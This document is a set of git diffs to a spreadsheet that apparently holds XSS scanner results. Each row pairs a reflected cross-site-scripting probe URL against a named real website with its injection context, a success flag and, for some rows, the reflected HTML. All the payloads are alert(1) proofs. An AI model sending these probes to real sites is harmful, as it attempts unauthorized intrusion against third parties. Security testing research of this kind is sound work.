--- a/sample_data/file.xlsx
+++ b/sample_data/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:C7"/>
+  <dimension ref="A1:C9"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="A12" sqref="A12"/>
@@ -459,6 +459,40 @@
         </is>
       </c>
     </row>
+    <row r="8">
+      <c r="A8" t="inlineStr">
+        <is>
+          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B8" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C8" t="inlineStr">
+        <is>
+          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="9">
+      <c r="A9" t="inlineStr">
+        <is>
+          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B9" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C9" t="inlineStr">
+        <is>
+          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
+        </is>
+      </c>
+    </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/sample_data/file.xlsx
+++ b/sample_data/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:C9"/>
+  <dimension ref="A1:C10"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="A12" sqref="A12"/>
@@ -493,6 +493,23 @@
         </is>
       </c>
     </row>
+    <row r="10">
+      <c r="A10" t="inlineStr">
+        <is>
+          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B10" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C10" t="inlineStr">
+        <is>
+          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
+        </is>
+      </c>
+    </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/sample_data/file.xlsx
+++ b/sample_data/file.xlsx
@@ -1,33 +1,54 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <workbookPr/>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
+  <fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/>
+  <workbookPr defaultThemeVersion="164011"/>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice Requires="x15">
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\GitHub\My_Project\sample_data\"/>
+    </mc:Choice>
+  </mc:AlternateContent>
   <bookViews>
-    <workbookView visibility="visible" minimized="0" showHorizontalScroll="1" showVerticalScroll="1" showSheetTabs="1" xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020" tabRatio="600" firstSheet="0" activeTab="0" autoFilterDateGrouping="1"/>
+    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020"/>
   </bookViews>
   <sheets>
-    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Sheet1" sheetId="1" state="visible" r:id="rId1"/>
+    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
   </sheets>
-  <definedNames/>
-  <calcPr calcId="0" fullCalcOnLoad="1"/>
+  <calcPr calcId="0"/>
 </workbook>
 </file>
 
+<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
+  <si>
+    <t>Attack URL</t>
+  </si>
+  <si>
+    <t>Context</t>
+  </si>
+  <si>
+    <t>Detection</t>
+  </si>
+  <si>
+    <t>Successful</t>
+  </si>
+</sst>
+</file>
+
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <numFmts count="0"/>
-  <fonts count="1">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" mc:Ignorable="x14ac x16r2">
+  <fonts count="1" x14ac:knownFonts="1">
     <font>
+      <sz val="11"/>
+      <color theme="1"/>
       <name val="Calibri"/>
       <family val="2"/>
-      <color theme="1"/>
-      <sz val="11"/>
       <scheme val="minor"/>
     </font>
   </fonts>
   <fills count="2">
     <fill>
-      <patternFill/>
+      <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
@@ -46,12 +67,21 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
   <cellXfs count="1">
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
+  <dxfs count="0"/>
   <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}">
+      <x14:slicerStyles defaultSlicerStyle="SlicerStyleLight1"/>
+    </ext>
+    <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{9260A510-F301-46a8-8635-F512D64BE5F5}">
+      <x15:timelineStyles defaultTimelineStyle="TimeSlicerStyleLight1"/>
+    </ext>
+  </extLst>
 </styleSheet>
 </file>
 
@@ -317,197 +347,33 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <sheetPr>
-    <outlinePr summaryBelow="1" summaryRight="1"/>
-    <pageSetUpPr/>
-  </sheetPr>
-  <dimension ref="A1:C10"/>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+  <dimension ref="A1:D1"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="A12" sqref="A12"/>
+      <selection activeCell="C2" sqref="C2"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
-    <col width="109.7109375" customWidth="1" min="1" max="1"/>
-    <col width="18.140625" customWidth="1" min="2" max="2"/>
-    <col width="96.42578125" customWidth="1" min="3" max="3"/>
+    <col min="1" max="1" width="109.7109375" customWidth="1"/>
+    <col min="2" max="2" width="13.5703125" customWidth="1"/>
+    <col min="3" max="3" width="13.7109375" customWidth="1"/>
+    <col min="4" max="4" width="96.42578125" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1">
-      <c r="A1" t="inlineStr">
-        <is>
-          <t>Attack URL</t>
-        </is>
+    <row r="1" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A1" t="s">
+        <v>0</v>
       </c>
-      <c r="B1" t="inlineStr">
-        <is>
-          <t>Context</t>
-        </is>
+      <c r="B1" t="s">
+        <v>1</v>
       </c>
-      <c r="C1" t="inlineStr">
-        <is>
-          <t>Detection</t>
-        </is>
+      <c r="C1" t="s">
+        <v>3</v>
       </c>
-    </row>
-    <row r="2">
-      <c r="A2" t="inlineStr">
-        <is>
-          <t>https://www.faz.net/suche/?query=' onmouseover='alert(1)&amp;resultsPerPage=20</t>
-        </is>
-      </c>
-      <c r="B2" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C2" t="inlineStr">
-        <is>
-          <t>&lt;div class="js-adobe-digital-data is-Invisible" data-digital-data='{"site":{"digitalAsset":"faz.net"},"internalSearch":{"term":"' onmouseover='alert(1)","numberOfResults":0},"page":{"name":"2.2064","ressort":"Suche","type":"suche","title":"Suche","seoTitle":"Suche und Suchergebnisse - FAZ"}}'&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="3">
-      <c r="A3" t="inlineStr">
-        <is>
-          <t>https://www.cgiar.org?s=" onmouseover="alert(1)</t>
-        </is>
-      </c>
-      <c r="B3" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C3" t="inlineStr">
-        <is>
-          <t>&lt;input class=""
-               type="text"
-               name="s"
-               id="s"
-               value="" onmouseover="alert(1)"
-               placeholder="Enter a word" /&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="4">
-      <c r="A4" t="inlineStr">
-        <is>
-          <t>https://www.redrivercatalog.com/search.html?addsearch=' onmouseover='alert(1)</t>
-        </is>
-      </c>
-      <c r="B4" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C4" t="inlineStr">
-        <is>
-          <t>&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="' onmouseover='alert(1)"&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="5">
-      <c r="A5" t="inlineStr">
-        <is>
-          <t>https://www.zentechnologies.com/search/search.php?query=" onmouseover="alert(1)&amp;search=1</t>
-        </is>
-      </c>
-      <c r="B5" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C5" t="inlineStr">
-        <is>
-          <t>&lt;input type="hidden" name="query" value="" onmouseover="alert(1)"&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="6">
-      <c r="A6" t="inlineStr">
-        <is>
-          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
-        </is>
-      </c>
-      <c r="B6" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C6" t="inlineStr">
-        <is>
-          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="7">
-      <c r="A7" t="inlineStr">
-        <is>
-          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
-        </is>
-      </c>
-      <c r="B7" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C7" t="inlineStr">
-        <is>
-          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="8">
-      <c r="A8" t="inlineStr">
-        <is>
-          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
-        </is>
-      </c>
-      <c r="B8" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C8" t="inlineStr">
-        <is>
-          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="9">
-      <c r="A9" t="inlineStr">
-        <is>
-          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
-        </is>
-      </c>
-      <c r="B9" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C9" t="inlineStr">
-        <is>
-          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
-        </is>
-      </c>
-    </row>
-    <row r="10">
-      <c r="A10" t="inlineStr">
-        <is>
-          <t>https://www.britannica.com/search?query=" onmouseover="alert(1)</t>
-        </is>
-      </c>
-      <c r="B10" t="inlineStr">
-        <is>
-          <t>ATTR</t>
-        </is>
-      </c>
-      <c r="C10" t="inlineStr">
-        <is>
-          <t>&lt;input name="query" id="search-page-search-query" placeholder="Search Britannica..." class="form-control form-control-lg search-query pr-50 shadow-sm" value="" onmouseover="alert(1)" maxlength="200" autocomplete="off"  aria-label="Search Britannica" /&gt;</t>
-        </is>
+      <c r="D1" t="s">
+        <v>2</v>
       </c>
     </row>
   </sheetData>

--- a/sample_data/file.xlsx
+++ b/sample_data/file.xlsx
@@ -1,54 +1,33 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/>
-  <workbookPr defaultThemeVersion="164011"/>
-  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\GitHub\My_Project\sample_data\"/>
-    </mc:Choice>
-  </mc:AlternateContent>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <workbookPr/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020"/>
+    <workbookView visibility="visible" minimized="0" showHorizontalScroll="1" showVerticalScroll="1" showSheetTabs="1" xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020" tabRatio="600" firstSheet="0" activeTab="0" autoFilterDateGrouping="1"/>
   </bookViews>
   <sheets>
-    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
+    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Sheet1" sheetId="1" state="visible" r:id="rId1"/>
   </sheets>
-  <calcPr calcId="0"/>
+  <definedNames/>
+  <calcPr calcId="0" fullCalcOnLoad="1"/>
 </workbook>
 </file>
 
-<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
-  <si>
-    <t>Attack URL</t>
-  </si>
-  <si>
-    <t>Context</t>
-  </si>
-  <si>
-    <t>Detection</t>
-  </si>
-  <si>
-    <t>Successful</t>
-  </si>
-</sst>
-</file>
-
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" mc:Ignorable="x14ac x16r2">
-  <fonts count="1" x14ac:knownFonts="1">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <numFmts count="0"/>
+  <fonts count="1">
     <font>
-      <sz val="11"/>
-      <color theme="1"/>
       <name val="Calibri"/>
       <family val="2"/>
+      <color theme="1"/>
+      <sz val="11"/>
       <scheme val="minor"/>
     </font>
   </fonts>
   <fills count="2">
     <fill>
-      <patternFill patternType="none"/>
+      <patternFill/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
@@ -67,21 +46,12 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
   <cellXfs count="1">
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="0"/>
   <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
-  <extLst>
-    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}">
-      <x14:slicerStyles defaultSlicerStyle="SlicerStyleLight1"/>
-    </ext>
-    <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{9260A510-F301-46a8-8635-F512D64BE5F5}">
-      <x15:timelineStyles defaultTimelineStyle="TimeSlicerStyleLight1"/>
-    </ext>
-  </extLst>
 </styleSheet>
 </file>
 
@@ -347,33 +317,1343 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:D1"/>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <sheetPr>
+    <outlinePr summaryBelow="1" summaryRight="1"/>
+    <pageSetUpPr/>
+  </sheetPr>
+  <dimension ref="A1:D60"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="C2" sqref="C2"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
+  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <cols>
-    <col min="1" max="1" width="109.7109375" customWidth="1"/>
-    <col min="2" max="2" width="13.5703125" customWidth="1"/>
-    <col min="3" max="3" width="13.7109375" customWidth="1"/>
-    <col min="4" max="4" width="96.42578125" customWidth="1"/>
+    <col width="109.7109375" customWidth="1" min="1" max="1"/>
+    <col width="13.5703125" customWidth="1" min="2" max="2"/>
+    <col width="13.7109375" customWidth="1" min="3" max="3"/>
+    <col width="96.42578125" customWidth="1" min="4" max="4"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A1" t="s">
-        <v>0</v>
-      </c>
-      <c r="B1" t="s">
-        <v>1</v>
-      </c>
-      <c r="C1" t="s">
-        <v>3</v>
-      </c>
-      <c r="D1" t="s">
-        <v>2</v>
+    <row r="1">
+      <c r="A1" t="inlineStr">
+        <is>
+          <t>Attack URL</t>
+        </is>
+      </c>
+      <c r="B1" t="inlineStr">
+        <is>
+          <t>Context</t>
+        </is>
+      </c>
+      <c r="C1" t="inlineStr">
+        <is>
+          <t>Successful</t>
+        </is>
+      </c>
+      <c r="D1" t="inlineStr">
+        <is>
+          <t>Detection</t>
+        </is>
+      </c>
+    </row>
+    <row r="2">
+      <c r="A2" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B2" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C2" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D2" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="3">
+      <c r="A3" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B3" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C3" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D3" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="4">
+      <c r="A4" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B4" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C4" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D4" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="5">
+      <c r="A5" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B5" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C5" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D5" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="6">
+      <c r="A6" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B6" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C6" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D6" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="7">
+      <c r="A7" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B7" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C7" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D7" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="8">
+      <c r="A8" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B8" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C8" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D8" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="9">
+      <c r="A9" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B9" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C9" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D9" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="10">
+      <c r="A10" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B10" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C10" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D10" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="11">
+      <c r="A11" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B11" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C11" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D11" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="12">
+      <c r="A12" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B12" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C12" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D12" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="13">
+      <c r="A13" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B13" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C13" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D13" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="14">
+      <c r="A14" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B14" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C14" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D14" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="15">
+      <c r="A15" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B15" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C15" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D15" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="16">
+      <c r="A16" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B16" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C16" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D16" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="17">
+      <c r="A17" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B17" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C17" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D17" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="18">
+      <c r="A18" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B18" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C18" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D18" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="19">
+      <c r="A19" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B19" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C19" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D19" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="20">
+      <c r="A20" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
